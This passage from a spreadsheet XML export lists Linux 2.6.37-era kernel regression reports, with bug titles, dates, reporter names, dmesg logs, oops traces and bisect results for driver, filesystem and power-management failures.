    <t>2010-12-19 22:22 UTC</t>
  </si>
  <si>
    <t>Ozlem Bilgir</t>
  </si>
  <si>
    <t>2011-03-04 23:35 UTC</t>
  </si>
  <si>
    <t>Although with the patch from Bug 5471 offline cpu goes to deepest sleep state, offline cpu prevents the sibling cpu to go the deepest sleep state. Here is c-state duration percentages from turbostat ( I also add an .csv attachment in case they doesn't look neat here) For a 2 socket, 8 physical/16 logical core processor, all cores are online. pkg core CPU %c0 GHz TSC %c1 %c3 %c6 %pc3 %pc6 0.09 1.91 2.27 0.15 1.72 98.04 9.93 75.00 0 0 0 0.50 1.80 2.27 0.55 2.43 96.53 9.93 74.99 0 0 8 0.24 1.83 2.27 0.81 2.43 96.53 9.93 74.99 0 1 1 0.06 1.97 2.27 0.20 0.00 99.74 9.93 74.99 0 1 9 0.18 2.12 2.27 0.08 0.00 99.74 9.93 74.99 0 2 2 0.03 2.04 2.27 0.04 0.00 99.93 9.93 74.98 0 2 10 0.04 1.99 2.27 0.03 0.00 99.93 9.93 74.98 0 3 3 0.02 2.08 2.27 0.01 0.00 99.97 9.93 74.98 0 3 11 0.01 1.96 2.27 0.02 0.00 99.97 9.93 74.98 1 0 4 0.17 2.13 2.27 0.10 11.37 88.36 9.93 75.02 1 0 12 0.05 2.04 2.27 0.22 11.37 88.36 9.93 75.02 1 1 5 0.04 1.72 2.27 0.08 0.00 99.88 9.93 75.02 1 1 13 0.03 1.62 2.27 0.09 0.00 99.88 9.93 75.02 1 2 6 0.02 1.82 2.27 0.05 0.00 99.93 9.93 75.02 1 2 14 0.03 1.76 2.27 0.04 0.00 99.93 9.93 75.02 1 3 7 0.01 1.84 2.27 0.02 0.00 99.97 9.93 75.02 1 3 15 0.00 1.74 2.27 0.02 0.00 99.98 9.93 75.02 After cpu15 is offlined, its sibling (cpu7) doesn't go to c-6 pkg core CPU %c0 GHz TSC %c1 %c3 %c6 %pc3 %pc6 0.21 1.90 2.27 1.22 6.74 91.83 75.48 0.00 0 0 0 0.93 1.75 2.27 2.19 0.60 96.29 75.48 0.00 0 0 8 0.30 1.79 2.27 2.81 0.60 96.29 75.48 0.00 0 1 1 0.16 2.05 2.27 0.53 0.00 99.31 75.48 0.00 0 1 9 0.50 2.19 2.27 0.18 0.00 99.31 75.48 0.00 0 2 2 0.06 2.00 2.27 1.17 0.00 98.77 75.48 0.00 0 2 10 0.06 1.95 2.27 1.17 0.00 98.77 75.48 0.00 0 3 3 0.03 2.08 2.27 2.07 0.00 97.90 75.48 0.00 0 3 11 0.04 2.08 2.27 2.07 0.00 97.90 75.48 0.00 1 0 4 0.47 1.87 2.27 2.43 0.00 97.10 75.48 0.00 1 0 12 0.14 1.87 2.27 2.76 0.00 97.10 75.48 0.00 1 1 5 0.17 1.97 2.27 0.36 0.00 99.47 75.48 0.00 1 1 13 0.14 1.86 2.27 0.40 0.00 99.47 75.48 0.00 1 2 6 0.05 1.91 2.27 0.07 0.00 99.88 75.48 0.00 1 2 14 0.03 1.80 2.27 0.09 0.00 99.88 75.48 0.00 1 3 7 0.01 1.93 2.27 0.01 99.98 0.00 75.48 0.00</t>
  </si>
  <si>
    <t>Battery removal crashes Sony Vaio</t>
  </si>
  <si>
    <t>2010-12-20 15:29 UTC</t>
  </si>
  <si>
    <t>Michael Doube</t>
  </si>
  <si>
    <t>2011-01-20 05:52 UTC</t>
  </si>
  <si>
    <t>Created attachment 41002 [details] Photograph of black screen of death Removal of battery while plugged into AC reliably crashes this laptop (Sony Vaio SZ650). This bug was not present in the last RC (-rc5).</t>
  </si>
  <si>
    <t>resizing ext4 will corrupt filesystem</t>
  </si>
  <si>
    <t>2010-12-20 20:56 UTC</t>
  </si>
  <si>
    <t>2011-03-31 19:24 UTC</t>
  </si>
  <si>
    <t>Using resize2fs on an ext4 will result in a corrupted filesystem. This is a regression (obviously). I would expect "fsck" to be clean on a recently resized filesystem, but it is not: Pass 5: Checking group summary information Block bitmap differences: +(2621440--2621951) +(2654210--2655360) +(2686976--2687487) +(2719744--2720255) +(2752512--2753023) +(2785280--2785791) +(2818048--2818559) +(2850816--2851327) +(2883584--2884095) +(2916352--2916863) +(2949120--2949631) +(2981888--2982399) +(3014656--3015167) +(3047424--3047935) +(3080192--3080703) +(3112960--3113471) +(3145728--3146239) +(3178496--3179007) +(3211264--3211775) +(3244032--3244543) +(3276800--3277311) +(3309568--3310079) +(3342336--3342847) +(3375104--3375615) +(3407872--3408383) +(3440640--3441151) +(3473408--3473919) +(3506176--3506687) +(3538944--3539455) +(3571712--3572223) +(3604480--3604991) +(3637248--3637759) +(3670016--3670527) +(3702784--3703295) +(3735552--3736063) +(3768320--3768831) +(3801088--3801599) +(3833856--3834367) +(3866624--3867135) +(3899392--3899903) etc Reproducer script attached...</t>
  </si>
  <si>
    <t>Firmware upload on resume fails with carl9170 driver</t>
  </si>
  <si>
    <t>2.6.35-23-generic #41-Ubuntu SMP Wed Nov 24 11:55:36 UTC 2010 x86_64 GNU/Linux</t>
  </si>
  <si>
    <t>2010-12-21 08:33 UTC</t>
  </si>
  <si>
    <t>Angus Turnbull</t>
  </si>
  <si>
    <t>Using compat-wireless 2010-12-10 compiled against a stock Ubuntu 10.10 x64 kernel on a Gigabyte GA-MA78GPM-UD2H motherboard (SB780) and AMD Phenom II chip, with a TP-LINK TL-WN821N USB wireless adaptor. The default ar9170usb driver suspends/resumes perfectly, but suffers from frequent disconnects which carl9170 remedies. However, upon resume from suspend the firmware upload fails with carl9170. Here's the relevant final portion of dmesg: [18693.982658] PM: resume of drv:usb dev:usb1 complete after 101.027 msecs [18694.020156] PM: resume of drv:usb dev:usb6 complete after 137.274 msecs [18694.020170] PM: resume of drv:hub dev:6-0:1.0 complete after 137.255 msecs [18694.022634] PM: resume of drv:usb dev:usb7 complete after 139.685 msecs [18694.022647] PM: resume of drv:hub dev:7-0:1.0 complete after 139.662 msecs [18694.022650] PM: resume of drv:usb dev:usb3 complete after 140.678 msecs [18694.022664] PM: resume of drv:hub dev:3-0:1.0 complete after 140.656 msecs [18694.022671] PM: resume of drv:usb dev:usb4 complete after 140.087 msecs [18694.022674] PM: resume of drv:usb dev:usb5 complete after 139.862 msecs [18694.022683] PM: resume of drv:hub dev:5-0:1.0 complete after 139.837 msecs [18694.022685] PM: resume of drv:hub dev:4-0:1.0 complete after 139.907 msecs [18694.082842] PM: resume of drv:usb dev:3-3 complete after 199.743 msecs [18694.082857] PM: resume of drv:usbhid dev:3-3:1.0 complete after 199.719 msecs [18694.082862] PM: resume of drv:usbhid dev:3-3:1.1 complete after 199.688 msecs [18694.083765] PM: resume of drv:usb dev:4-1 complete after 200.518 msecs [18694.083776] PM: resume of drv:usbhid dev:4-1:1.0 complete after 191.166 msecs [18694.230153] ata8: SATA link down (SStatus 0 SControl 300) [18694.230195] ata4: SATA link down (SStatus 0 SControl 300) [18694.230197] ata7: SATA link down (SStatus 0 SControl 300) [18694.232645] ata6: SATA link down (SStatus 0 SControl 300) [18694.430128] ata5: softreset failed (device not ready) [18694.430131] ata5: applying SB600 PMP SRST workaround and retrying [18694.442652] firewire_core: rediscovered device fw0 [18694.630127] ata5: SATA link up 1.5 Gbps (SStatus 113 SControl 300) [18694.683130] ata5.00: configured for UDMA/100 [18696.080118] usb 1-2: firmware upload failed (-110). [18696.083728] carl9170 1-2:1.0: resume error -110 [18696.083732] PM: resume of drv:usb dev:1-2 complete after 2200.666 msecs [18696.083745] PM: resume of drv:carl9170 dev:1-2:1.0 complete after 2200.675 msecs [18696.083757] PM: resume of drv: dev:ep_01 complete after 2060.927 msecs [18699.770134] ata3: softreset failed (device not ready) [18699.770137] ata3: applying SB600 PMP SRST workaround and retrying [18699.970147] ata3: SATA link up 3.0 Gbps (SStatus 123 SControl 300) [18699.998109] ata3.00: configured for UDMA/133 [18700.012898] PM: resume of drv:sd dev:2:0:0:0 complete after 6129.690 msecs [18700.012908] PM: resume of drv:scsi_disk dev:2:0:0:0 complete after 3929.098 msecs [18700.012911] PM: resume of drv:scsi_device dev:2:0:0:0 complete after 6129.693 msecs [18700.013136] PM: resume of devices complete after 6132.203 msecs [18700.013262] PM: resume devices took 6.130 seconds [18700.013396] PM: Finishing wakeup. [18700.013397] Restarting tasks ... done. After running "modprobe -r carl9170 &amp;&amp; modprobe carl9170" it works as expected: [18714.462688] usbcore: deregistering interface driver carl9170 [18715.001029] Compat-wireless backport release: compat-wireless-2010-12-10-3-g880bb0b [18715.001036] Backport based on linux-next.git next-20101216 [18715.012350] cfg80211: Calling CRDA to update world regulatory domain [18715.023187] cfg80211: World regulatory domain updated: [18715.023194] cfg80211: (start_freq - end_freq @ bandwidth), (max_antenna_gain, max_eirp) [18715.023203] cfg80211: (2402000 KHz - 2472000 KHz @ 40000 KHz), (300 mBi, 2000 mBm) [18715.023210] cfg80211: (2457000 KHz - 2482000 KHz @ 20000 KHz), (300 mBi, 2000 mBm) [18715.023217] cfg80211: (2474000 KHz - 2494000 KHz @ 20000 KHz), (300 mBi, 2000 mBm) [18715.023223] cfg80211: (5170000 KHz - 5250000 KHz @ 40000 KHz), (300 mBi, 2000 mBm) [18715.023229] cfg80211: (5735000 KHz - 5835000 KHz @ 40000 KHz), (300 mBi, 2000 mBm) [18715.142699] usb 1-2: reset high speed USB device using ehci_hcd and address 2 [18716.320697] usbcore: registered new interface driver carl9170 [18716.324602] usb 1-2: driver API: 1.9.0 2010-10-29 [1-1] [18716.324612] usb 1-2: firmware API: 1.9.1 2010-12-06 .....etc..... Other USB devices are a MS keyboard and Logitech mouse, both of which resume well.</t>
  </si>
  <si>
    <t>kernel (2.6.37-8-generic_amd64) panic on boot (with message "map_single: bounce buffer is not DMA'ble) - possible regression !!!</t>
  </si>
  <si>
    <t>2.6.37-rc1 to 2.6.38rc4</t>
  </si>
  <si>
    <t>2010-12-21 19:58 UTC</t>
  </si>
  <si>
    <t>carlos</t>
  </si>
  <si>
    <t>2011-03-06 12:29 UTC</t>
  </si>
  <si>
    <t>I've detected this possible regression when upgrading from Ubuntu 10.10 (Kernel 2.6.35-24) to Ubuntu Natty A1 (2.6.37-rc1). Kernel 2.6.36-2 also works perfectly, which could indicate that a possible regression exists between 2.6.36-2 and 2.6.37-rc1 (2.6.37-rc6 has the same problem). The problem: The booting process crashes at the beginning (the PC simply doesn't respond) with the following Kernel Panic Msg (written by hand because none registered on log files): "map_single: bounce buffer is not DMA'ble" Network manager not Tainted ... ?panic+0xbf/0x200 ?default_spin_lock_flags+0x9/0x10 ?swiotlb_map_single+0x1ce/0x250 ?map_single+0x46/0x60 ?swiotlb_map_page++0x0/0xf0 ... A few interesting boot messages change between 2.6.36 and 2.637 are: 1) 2.6.36-2 (and prior): "Scanning 1 areas for low memory corruption" 2.6.36-rc1 (and after): "Scanning 0 areas for low memory corruption" 2) RAMDISK gives &lt;&gt; quantities 3) it stops logging data on last line bellow (ACPI: DSDT doesn't show in 2.6.37) RAMDISK: 37571000 - 37ff0000 ACPI: RSDP 00000000000fbbf0 00024 (v02 DELL ) ACPI: XSDT 00000000dfe6f200 0005C (v01 DELL M08 27D80415 ASL 00000061) ACPI: FACP 00000000dfe6f09c 000F4 (v04 DELL M08 27D80415 ASL 00000061) ACPI: DSDT 00000000dfe6f800 05658 (v02 INT430 SYSFexxx 00001001 INTL 20050624) Could it be a DELL firmware problem (it already has last BIOS) ? Also reported in Ubuntu: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/688383 Machine (DELL Vostro 1700, 4GB RAM; Bios A07)</t>
  </si>
  <si>
    <t>bisected: ACPI SCI interrupt storm - Dell Studio XPS 435MT, i7-940</t>
  </si>
  <si>
    <t>2010-12-21 22:45 UTC</t>
  </si>
  <si>
    <t>2011-03-30 22:51 UTC</t>
  </si>
  <si>
    <t>nouveau fails to build on ia64</t>
  </si>
  <si>
    <t>2010-12-22 01:49 UTC</t>
  </si>
  <si>
    <t>2011-02-02 23:46 UTC</t>
  </si>
  <si>
    <t>Created attachment 41242 [details] patch for nouveau Kconfig If CONFIG_ACPI is enabled, CONFIG_NOUVEAU selects CONFIG_ACPI_VIDEO. However, CONFIG_ACPI_VIDEO depends on more than just CONFIG_ACPI, and in particular will never be set on ia64. Previously reported with patch at &lt;http://article.gmane.org/gmane.comp.video.dri.devel/52445&gt;</t>
  </si>
  <si>
    <t>Alpha fails to build with gcc 4.4</t>
  </si>
  <si>
    <t>2010-12-22 01:55 UTC</t>
  </si>
  <si>
    <t>2011-02-09 04:59 UTC</t>
  </si>
  <si>
    <t>This seems to be well-known but is not yet on the regression list. When building the kernel for alpha using gcc 4.4, many files will provoke these warnings: arch/alpha/include/asm/io.h: In function '__set_hae': arch/alpha/include/asm/io.h:41: warning: 'arch_local_irq_save' is static but used in inline function '__set_hae' which is not static arch/alpha/include/asm/io.h:49: warning: 'arch_local_irq_restore' is static but used in inline function '__set_hae' which is not static and because the alpha makefiles include -Werror in CFLAGS, this is fatal.</t>
  </si>
  <si>
    <t>ixp4xx defines FREQ macro; conflicts with gspca/ov519 driver</t>
  </si>
  <si>
    <t>2010-12-22 02:02 UTC</t>
  </si>
  <si>
    <t>2011-02-12 23:10 UTC</t>
  </si>
  <si>
    <t>Created attachment 41252 [details] patch to rename FREQ macro When building for the ARM IXP4xx platform, &lt;linux/timex.h&gt; ends up including arch/arm/mach-ixp4xx/include/mach/timex.h which defines the macro FREQ. This conflicts with use of FREQ as an enumerator in drivers/media/video/gspca/ov519.c. Since the macro is platform-specific, its name really ought to be given a suitable prefix to avoid such conflicts. Previously reported with patch at &lt;http://article.gmane.org/gmane.linux.ports.arm.kernel/99147&gt;</t>
  </si>
  <si>
    <t>snd_hda_intel does not work with IDT 92HD73C1X in Dell Studio 1558</t>
  </si>
  <si>
    <t>2.6.37-rc7</t>
  </si>
  <si>
    <t>Scott Chevalley</t>
  </si>
  <si>
    <t>2010-12-29 22:57 UTC</t>
  </si>
  <si>
    <t>Created attachment 41362 [details] lspci --vv to show hardware starting with the 2.6.37-rc set of kernels, the internal soundcard does not get initialized properly. Under 2.6.36.2 it works fine. When booting with a 2.6.37 series kernel this line appears in dmesg: hda_codec: cannot build controls for #0 (error -16) and alsamixer says it cannot find any controls for that device. I have tried adding: options snd-hda-intel model=dell-m6 to /etc/modprobe.d/alsa-base but it makes no difference (based on a website I found). I also tried adding pci=nomsi based on another comment, but that also doesn't work. attached is lspci -vv from my system. I'm currently running Mandriva Cooker x86_64.</t>
  </si>
  <si>
    <t>Kernel doe not shutdown on dell E6400</t>
  </si>
  <si>
    <t>2010-12-23 09:41 UTC</t>
  </si>
  <si>
    <t>2011-02-18 18:02 UTC</t>
  </si>
  <si>
    <t>I tested two shutdown (one stay blocked one night and the other did not finish as well) I have the following messages: Will now halt hub:4-0:1.0: hub_port_status_failed (err 110) repeated twice My config did not change for almost one year...</t>
  </si>
  <si>
    <t>kernel panic when removing battery</t>
  </si>
  <si>
    <t>2.6.37-rc6.25.1</t>
  </si>
  <si>
    <t>2010-12-24 19:27 UTC</t>
  </si>
  <si>
    <t>matthias</t>
  </si>
  <si>
    <t>2010-12-29 22:58 UTC</t>
  </si>
  <si>
    <t>hi, this is my first kernel.org bug report so please forgive me if its not perfect. when i remove one of the 2 batteries in my laptop the system crashes with a lot of error info. i remember the last line being about "unable to handle pageing request" i would love to give you the hole errormsg but i dont know how to access it. i have to restart my pc in order to continue working. this does not depend on the ac adapter being plugged in or not. i believe this was working on one of the earlier release candidates. it definetly works with the 2.6.36... hope this helps you. thx and happy holidays matthias my system: panasonic toughbook cf-30k (mk3); 4gb ram; 2 batteries; ssd; 8gb swap; gobi modem opensuse 11.3; kde; head kernel 2.6.37-rc6.25.1; smeegol packages installed</t>
  </si>
  <si>
    <t>Kernel oops (NULL pointer deref) during boot on stac92xx_unsol_event</t>
  </si>
  <si>
    <t>2010-12-27 12:08 UTC</t>
  </si>
  <si>
    <t>Nicos P.</t>
  </si>
  <si>
    <t>2011-02-02 23:49 UTC</t>
  </si>
  <si>
    <t>Created attachment 41702 [details] Full kernel log I am using linux-image-2.6.37-rc7-amd64 (2.6.37~rc7-1~experimental.1) from debian experimental. My motherboard is Intel D946GZIS. During boot I get this oops and sound does not work. It used to work on 2.6.36 and before. Below is the relevant part of dmesg. I also attached the whole thing (kernel.log). I am new to submitting kernel bugs so I apologise beforehand if I am missing any info. Please let me know if you need anything else. [ 6.267424] HDA Intel 0000:00:1b.0: PCI INT A -&gt; GSI 22 (level, low) -&gt; IRQ 22 [ 6.267479] HDA Intel 0000:00:1b.0: irq 40 for MSI/MSI-X [ 6.267505] HDA Intel 0000:00:1b.0: setting latency timer to 64 [ 6.320950] input: HDA Digital PCBeep as /devices/pci0000:00/0000:00:1b.0/input/input6 [ 6.520042] BUG: unable to handle kernel NULL pointer dereference at (null) [ 6.520066] IP: [&lt;ffffffffa072cc3b&gt;] stac92xx_unsol_event+0x38b/0x577 [snd_hda_codec_idt] [ 6.520087] PGD 36854067 PUD 7bc27067 PMD 0 [ 6.520100] Oops: 0000 [#1] SMP [ 6.520108] last sysfs file: /sys/module/snd_hda_codec/initstate [ 6.520119] CPU 0 [ 6.520123] Modules linked in: snd_hda_codec_idt snd_hda_intel(+) snd_hda_codec snd_hwdep snd_pcm_oss snd_mixer_oss snd_pcm snd_seq_midi snd_rawmidi snd_seq_midi_event snd_seq snd_timer snd_seq_device rng_core snd parport_pc joydev evdev parport soundcore snd_page_alloc processor i2c_i801 pcspkr tpm_tis tpm tpm_bios shpchp pci_hotplug psmouse serio_raw ext4 mbcache jbd2 crc16 usbhid hid uas usb_storage btrfs zlib_deflate crc32c libcrc32c sg sd_mod crc_t10dif sr_mod cdrom ata_generic nouveau ttm ata_piix uhci_hcd libata drm_kms_helper drm i2c_algo_bit ehci_hcd i2c_core usbcore video e100 mii scsi_mod thermal_sys output button nls_base [last unloaded: scsi_wait_scan] [ 6.520310] [ 6.520315] Pid: 483, comm: modprobe Not tainted 2.6.37-rc7-amd64 #1 D946GZIS/ [ 6.520323] RIP: 0010:[&lt;ffffffffa072cc3b&gt;] [&lt;ffffffffa072cc3b&gt;] stac92xx_unsol_event+0x38b/0x577 [snd_hda_codec_idt] [ 6.520337] RSP: 0018:ffff88007c343c68 EFLAGS: 00010246 [ 6.520343] RAX: 0000000000000000 RBX: ffff880079d9a400 RCX: 0000000000000701 [ 6.520350] RDX: 0000000000000000 RSI: 0000000000000000 RDI: ffff880079d9a400 [ 6.520357] RBP: ffff88007954d000 R08: 0000000000000000 R09: 0000000000000708 [ 6.520366] R10: ffff88007ec0fd30 R11: ffff88007ec136c0 R12: ffff88007954d1a0 [ 6.520373] R13: ffff88003673dc08 R14: ffff88007954d004 R15: ffff88007f817090 [ 6.520381] FS: 00007f7683d8b700(0000) GS:ffff88007ec00000(0000) knlGS:0000000000000000 [ 6.520389] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b [ 6.520395] CR2: 0000000000000000 CR3: 000000007bc40000 CR4: 00000000000006f0 [ 6.520403] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 6.520410] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 [ 6.520418] Process modprobe (pid: 483, threadinfo ffff88007c342000, task ffff88007f116540) [ 6.520426] Stack: [ 6.520429] 0000000000000000 ffff880079d9a400 000000000000000b ffff88007954d000 [ 6.520442] 000000000000000b ffff880079d9a400 ffff88007954d000 0000000000000001 [ 6.520454] ffff88007954d000 ffff88007954d004 ffff88007f817090 ffffffffa072a185 [ 6.520466] Call Trace: [ 6.520474] [&lt;ffffffffa072a185&gt;] ? stac92xx_init+0x393/0x66c [snd_hda_codec_idt] [ 6.520486] [&lt;ffffffffa0701125&gt;] ? snd_hda_codec_build_controls+0x23/0x42 [snd_hda_codec] [ 6.520497] [&lt;ffffffffa07030b6&gt;] ? snd_hda_build_controls+0x1a/0x73 [snd_hda_codec] [ 6.520508] [&lt;ffffffffa071f821&gt;] ? azx_probe+0x7cc/0x86b [snd_hda_intel] [ 6.520519] [&lt;ffffffff8123dd45&gt;] ? __pm_runtime_set_status+0x162/0x186 [ 6.520528] [&lt;ffffffff811aed2e&gt;] ? local_pci_probe+0x49/0x92 [ 6.520536] [&lt;ffffffff811afa35&gt;] ? pci_device_probe+0xc2/0xef [ 6.520544] [&lt;ffffffff8123737e&gt;] ? driver_sysfs_add+0x66/0x8d [ 6.520551] [&lt;ffffffff812374bf&gt;] ? driver_probe_device+0xa8/0x138 [ 6.520558] [&lt;ffffffff8123759e&gt;] ? __driver_attach+0x4f/0x6f [ 6.520565] [&lt;ffffffff8123754f&gt;] ? __driver_attach+0x0/0x6f [ 6.520573] [&lt;ffffffff81236b48&gt;] ? bus_for_each_dev+0x44/0x78 [ 6.520580] [&lt;ffffffff81236fa0&gt;] ? bus_add_driver+0xa8/0x1f0 [ 6.520587] [&lt;ffffffff81237845&gt;] ? driver_register+0x90/0xf8 [ 6.520595] [&lt;ffffffff811afc7f&gt;] ? __pci_register_driver+0x4e/0xc0 [ 6.520604] [&lt;ffffffffa0724000&gt;] ? alsa_card_azx_init+0x0/0x20 [snd_hda_intel] [ 6.520613] [&lt;ffffffff81002079&gt;] ? do_one_initcall+0x78/0x131 [ 6.520622] [&lt;ffffffff81075dac&gt;] ? sys_init_module+0x97/0x1d3 [ 6.520629] [&lt;ffffffff81009a12&gt;] ? system_call_fastpath+0x16/0x1b [ 6.520636] Code: 8d 95 a0 01 00 00 85 c0 4c 0f 44 e2 45 8a 44 24 03 45 84 c0 78 1d 48 8b 85 68 01 00 00 45 0f be c0 b9 01 07 00 00 31 d2 48 89 df &lt;0f&gt; b7 30 e8 b5 3f fd ff 45 8a 44 24 02 45 84 c0 78 1d 48 8b 85 [ 6.520729] RIP [&lt;ffffffffa072cc3b&gt;] stac92xx_unsol_event+0x38b/0x577 [snd_hda_codec_idt] [ 6.520740] RSP &lt;ffff88007c343c68&gt; [ 6.520744] CR2: 0000000000000000 [ 6.522186] ---[ end trace 6fbb469bd6db683d ]---</t>
  </si>
  <si>
    <t>[cppcheck] found regression due to missing "{"</t>
  </si>
  <si>
    <t>linux-2.6</t>
  </si>
  <si>
    <t>2010-12-27 12:39 UTC</t>
  </si>
  <si>
    <t>2011-01-24 12:57 UTC</t>
  </si>
  <si>
    <t>cppcheck, a static code analysis tool (http://sourceforge.net/projects/cppcheck/). It found a regression in file linux-2.6/arch/mn10300/kernel/irq.c. This only happens when the preprocessor define CONFIG_HOTPLUG_CPU is set. Please refer the attached patch that fixes the issue. Best regards from the cppcheck team Martin</t>
  </si>
  <si>
    <t>asus laptop doesn't have sound anymore</t>
  </si>
  <si>
    <t>2010-12-27 12:53 UTC</t>
  </si>
  <si>
    <t>2012-06-13 15:00 UTC</t>
  </si>
  <si>
    <t>I just tried a newer kernel and noticed that I didn't have any sound anymore. Normally I hear all kind of interference in the earphones and now it stops when asus_laptop gets loaded. I can play things, but nothing comes out. It feels like it disables something it shouldn't. I did a bisect with this as result: d99b577c729c4a29679fb1f605f9ccace154e0e5 is the first bad commit commit d99b577c729c4a29679fb1f605f9ccace154e0e5 Author: Corentin Chary &lt;corentin.chary@gmail.com&gt; Date: Fri Jan 22 21:20:57 2010 +0100 asus-laptop: stop using ASUS_HANDLE and use relative methods instead Stop using ASUS_HANDLE because most of the time it is not needed. This macro was introduced to display_get and lcd_switch which are not part of the interface provided by Asus, and are scheduled for removal. Signed-off-by: Corentin Chary &lt;corentincj@iksaif.net&gt; :040000 040000 4576a0beef38ee3440e14d2ad3f194cfa3526d2a b7b0beae2cdd848738ea5b30d7a05d800e756cfa M drivers</t>
  </si>
  <si>
    <t>regression: zram stopped working in 2.6.37-rc</t>
  </si>
  <si>
    <t>2010-12-27 15:04 UTC</t>
  </si>
  <si>
    <t>2013-10-04 19:45 UTC</t>
  </si>
  <si>
    <t>Data written to zram is not retained in 2.6.37. It worked fine before. So we've got a regression that stops it from working. There is a bug filed for this issue here as well: http://code.google.com/p/compcache/issues/detail?id=78 It would of course be nice to release 2.6.37 with a working zram module. Looking over the changes, it doesn't seem like the problem comes from a change in zram's code: http://bit.ly/i3HrXr, but rather out of the zram staging tree. This means it could be related to other bugs.</t>
  </si>
  <si>
    <t>[G35] i915 turns picture green when display switched off-on</t>
  </si>
  <si>
    <t>2010-12-27 22:14 UTC</t>
  </si>
  <si>
    <t>Tõnu Raitviir</t>
  </si>
  <si>
    <t>2012-11-05 23:15 UTC</t>
  </si>
  <si>
    <t>Paulo Zanoni</t>
  </si>
  <si>
    <t>Asus P5E-VM HDMI motherboard (G35 chipset) with only HDMI output connected. Initially everything is normal but after turning display off and back on picture appears green -- instead of white text on black background there is light green text on dark green background and also some colour bleeding appears at straight edges. Bisect gave me this: 3c17fe4b8f40a112a85758a9ab2aebf772bdd647 is the first bad commit commit 3c17fe4b8f40a112a85758a9ab2aebf772bdd647 Author: David Härdeman &lt;david@hardeman.nu&gt; Date: Fri Sep 24 21:44:32 2010 +0200 i915: enable AVI infoframe for intel_hdmi.c [v4] This patch enables the sending of AVI infoframes in drivers/gpu/drm/i915/intel_hdmi.c. My receiver currently loses sync when the HDMI output on my computer (DG45FC motherboard) is switched from 800x600 (the BIOS resolution) to 1920x1080 as part of the boot. Fixable by switching inputs on the receiver a couple of times. With this patch, my receiver has not lost sync yet (&gt; 40 tries). Fourth version, now based on drm-intel-next from: git://git.kernel.org/pub/scm/linux/kernel/git/ickle/drm-intel.git Two questions still remain: I'm assuming that the sdvo hardware also stores a header ECC byte in the MSB of the first dword - is this correct? Does the SDVOB and SDVOC handling in intel_hdmi_set_avi_infoframe() look correct? Signed-off-by: David Härdeman &lt;david@hardeman.nu&gt; Signed-off-by: Chris Wilson &lt;chris@chris-wilson.co.uk&gt; :040000 040000 691f5ca8361ca600cc220986609a2225cdadff26 c9d2208c9e04a373d6804e1ac4795ea9ce545a01 M drivers</t>
  </si>
  <si>
    <t>2.6.37-rc7: Regression: b43: crashes in hwrng_register()</t>
  </si>
  <si>
    <t>2010-12-29 10:28 UTC</t>
  </si>
  <si>
    <t>2011-01-15 13:11 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.37-rc7: Regression: b43: crashes in hwrng_register() Submitter : "Mario 'BitKoenig' Holbe" &lt;Mario.Holbe@tu-ilmenau.de&gt; Date : 2010-12-28 13:32 Message-ID : slrnihjpnh.7t4.Mario.Holbe@darkside.dyn.samba-tng.org References : http://marc.info/?l=linux-kernel&amp;m=129354319002301&amp;w=2 This entry is being used for tracking a regression from 2.6.36. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[BUG] kernel BUG at mm/truncate.c:479! on 2.6.37-rc8</t>
  </si>
  <si>
    <t>2.6.37-rc8</t>
  </si>
  <si>
    <t>2010-12-29 10:40 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG] kernel BUG at mm/truncate.c:479! on 2.6.37-rc8 Submitter : Gurudas Pai &lt;gurudas.pai@oracle.com&gt; Date : 2010-12-29 6:58 Message-ID : 4D1AD935.1020504@oracle.com References : http://marc.info/?l=linux-kernel&amp;m=129360511222037&amp;w=2 This entry is being used for tracking a regression from 2.6.36. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>thinkpad T410s intel i915 regression</t>
  </si>
  <si>
    <t>2010-12-29 18:21 UTC</t>
  </si>
  <si>
    <t>Travis Hume</t>
  </si>
  <si>
    <t>2010-12-30 22:32 UTC</t>
  </si>
  <si>
    <t>2.6.37-rc7 working great. built 2.6.37-rc8 this morning and screen is unusable. Off center to the right by about 200 px and very jittery. Sorry for the overly technical description :) Ubuntu 10.10 From lshw: *-display description: VGA compatible controller product: Core Processor Integrated Graphics Controller vendor: Intel Corporation physical id: 2 bus info: pci@0000:00:02.0 version: 02 width: 64 bits clock: 33MHz capabilities: msi pm vga_controller bus_master cap_list rom configuration: driver=i915 latency=0 resources: irq:43 memory:f2000000-f23fffff memory:d0000000-dfffffff ioport:1800(size=8)</t>
  </si>
  <si>
    <t>rmmod causes kernel oops</t>
  </si>
  <si>
    <t>2.6.36.2</t>
  </si>
  <si>
    <t>2010-12-29 19:38 UTC</t>
  </si>
  <si>
    <t>2011-04-04 13:13 UTC</t>
  </si>
  <si>
    <t>After bringing up the net, and it ran for a while, then conections were taking a long time to get established and most would fail. So, ifdown'ed wlan0, and killed wpa_supplicant and rmmod'ed all rt2.... modules. That's when I got the kernel oops. # cat /tmp/kernel.oops Dec 26 04:35:32 vger kernel: Modules linked in: usb_storage ipheth aes_i586 aes_generic irnet ppp_generic slhc irtty_sir sir_dev ircomm_tty ircomm vboxnetadp vboxnetflt vboxdrv ipv6 mperf nf_conntrack_netbios_ns ipt_LOG vfat fat fuse uinput snd_intel8x0m snd_intel8x0 snd_ac97_codec arc4 ecb ac97_bus rt2800pci snd_seq rt2800lib rt2x00pci snd_seq_device rt2x00lib sis900 snd_pcm ppdev mac80211 video snd_timer mii snd soundcore cfg80211 parport_pc eeprom_93cx6 parport irda k8temp snd_page_alloc pcspkr joydev serio_raw crc_ccitt output i2c_sis96x sata_sil ata_generic firewire_ohci pata_acpi firewire_core yenta_socket pata_sis crc_itu_t radeon ttm drm_kms_helper drm fb fbdev hwmon i2c_algo_bit cfbcopyarea cfbimgblt cfbfillrect [last unloaded: scsi_wait_scan] Dec 26 04:35:32 vger kernel: Dec 26 04:35:32 vger kernel: Pid: 1896, comm: wpa_supplicant Not tainted 2.6.36.2-1.fc13.i686 #4 / Dec 26 04:35:32 vger kernel: EIP: 0060:[&lt;f874f306&gt;] EFLAGS: 00210202 CPU: 0 Dec 26 04:35:32 vger kernel: EIP is at rt2x00queue_init_queues+0x46/0xa0 [rt2x00lib] Dec 26 04:35:32 vger kernel: EAX: 00000000 EBX: 